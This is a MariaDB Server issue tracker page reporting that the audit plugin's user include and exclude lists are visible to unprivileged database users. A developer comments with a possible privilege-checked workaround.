Uploaded image for project: 'MariaDB Server'
  1. MariaDB Server
  2. MDEV-5245

Audit plugin reveals user lists to unprivileged users

    Details

    • Type: Task
    • Status: In Progress
    • Priority: Major
    • Resolution: Unresolved
    • Fix Version/s: None
    • Component/s: None
    • Labels:
      None

      Description

      It's not a bug from the coding perspective, but possibly a specification one, or at least a point for consideration.

      When server_audit_excl_users or server_audit_incl_users are configured, they (as other variables) are visible to any database user, even the least privileged ones. Thus a user gets access to other users' login names and audit settings which is probably not a good idea in production.

      At the moment I don't have any suggestions on how to make it better, I'm not sure if there are any mechanisms to hide a system variable contents from a user.

        Gliffy Diagrams

          Attachments

            Issue Links

              Activity

              Hide
              serg Sergei Golubchik added a comment -

              I could think of a workaround. E.g. keep the variable value (the string that's shown in I_S and SHOW) always empty, the update callback will update internal filters but not the user-visible variable value.

              That's kind of bad, because the user won't see the current filter.

              It can be exported via another status variable, and there SHOW_FUNC will check privileges and only show the filter to a SUPER user.

              The main question — is is something we want to do?

              Show
              serg Sergei Golubchik added a comment - I could think of a workaround. E.g. keep the variable value (the string that's shown in I_S and SHOW) always empty, the update callback will update internal filters but not the user-visible variable value. That's kind of bad, because the user won't see the current filter. It can be exported via another status variable, and there SHOW_FUNC will check privileges and only show the filter to a SUPER user. The main question — is is something we want to do?

                People

                • Assignee:
                  holyfoot Alexey Botchkov
                  Reporter:
                  elenst Elena Stepanova
                • Votes:
                  0 Vote for this issue
                  Watchers:
                  2 Start watching this issue

                  Dates

                  • Created:
                    Updated: